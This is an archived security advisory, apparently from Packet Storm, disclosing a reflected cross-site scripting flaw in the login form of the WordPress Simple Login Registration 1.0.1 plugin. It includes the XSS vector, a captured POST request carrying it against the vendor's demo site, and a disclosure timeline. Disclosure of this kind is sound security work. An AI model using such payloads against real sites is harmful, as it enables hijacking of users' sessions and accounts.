what you don't know can hurt you

WordPress Simple Login Registration 1.0.1 Cross Site Scripting

WordPress Simple Login Registration 1.0.1 Cross Site Scripting
Posted Aug 26, 2013
Authored by Dylan Irzi

WordPress Simple Login Registration version 1.0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 9cc05b986b622b27325cbfd7eb0dd01b

WordPress Simple Login Registration 1.0.1 Cross Site Scripting

Change Mirror Download
###########################################################################################
# Exploit Title: Cross Site Scripting WP Simple Login Registration 1.0.1 -
Wordpress
# Date: 26 de Agosto del 2013
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage:
http://envato.dropntheme.com/wp-simple-login-registration-plugin/
# Tested on: Win8 & Linux Mint
# Affected Version : 1.01 y Posteriores.
###########################################################################################
Timeline:
- 20 De agosto XSS Encontrado y Reportado.
- 25 De Agosto Vendedor responde que la vulnerabilidad es por PHP.INI
- 26 De Agosto Diclosure!!


------------------------------------------------------------------------------------------
Campos de Login Son Vulnerables a Cross Site Scripting Reflected Via Post.

<input id="username" class="text-input" type="text" value="Vector XSS"
name="username">
<input type="password" class="text-input" id="password" name="password">

Vector: ""><img src=x onerror=prompt(/XSS/);>>
Example:
http://envato.dropntheme.com/wp-simple-login-registration-plugin/live-demo/login/

http Live Request.
------------------------------------------------------------------------------------------
Host: envato.dropntheme.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0 AlexaToolbar/alxf-2.18
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer:
http://envato.dropntheme.com/wp-simple-login-registration-plugin/live-demo/login/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

POST:
username=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&password=&remember-me=forever&submit=Log+in&login_nonce_field=a72b0d3cb6&_wp_http_referer=%2Fwp-simple-login-registration-plugin%2Flive-demo%2Flogin%2F&wpslrp_action=ddsfeu_login

------------------------------------------------------------------------------------------

*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.*

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    6 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close